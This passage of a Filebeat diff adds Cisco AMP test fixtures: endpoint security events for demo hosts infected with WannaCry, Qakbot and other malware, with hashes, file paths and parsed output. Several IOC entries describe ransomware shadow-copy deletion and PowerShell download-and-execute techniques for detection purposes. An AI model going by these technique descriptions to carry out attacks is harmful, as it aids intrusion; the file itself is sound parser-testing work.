+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity 
Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json
new file mode 100644
index 00000000000..3e3f7423594
--- /dev/null
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json
@@ -0,0 +1,2853 @@ +[ + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867970", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 646000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204901661835279", + 
"cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 459000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 1186, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204901661835278", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 443000000, + "event.action": "Threat Detected", + 
"event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 2465, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204901661835276", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 69000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": 
